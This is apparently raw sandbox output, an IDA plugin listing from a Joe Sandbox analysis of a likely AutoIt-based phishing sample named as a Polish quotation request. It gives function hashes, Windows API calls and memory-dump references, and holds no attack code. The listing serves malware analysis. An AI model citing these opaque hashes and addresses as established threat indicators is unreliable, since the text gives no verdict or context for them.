                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: Combobox
                                                                                                                                                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                      • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                                                                                                                                                      • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                                      • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                                                                                                                                                      • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 455545452-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                                                                                                                                      • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 455545452-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                                                                                                                                      • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 455545452-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                                                                                                                                      • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004560E9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend_mallocwsprintf
                                                                                                                                                                                                                                                      • String ID: %d/%02d/%02d
                                                                                                                                                                                                                                                      • API String ID: 1262938277-328681919
                                                                                                                                                                                                                                                      • Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                                                                                                                                                                                      • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                                                                                                                                                                        • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                      • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                                                                                                                                      • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                                                                                                                                                        • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                      • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                                                                                                      • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                                                                                                                                                        • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message_doexit
                                                                                                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                                                      • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                                                                                                      • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E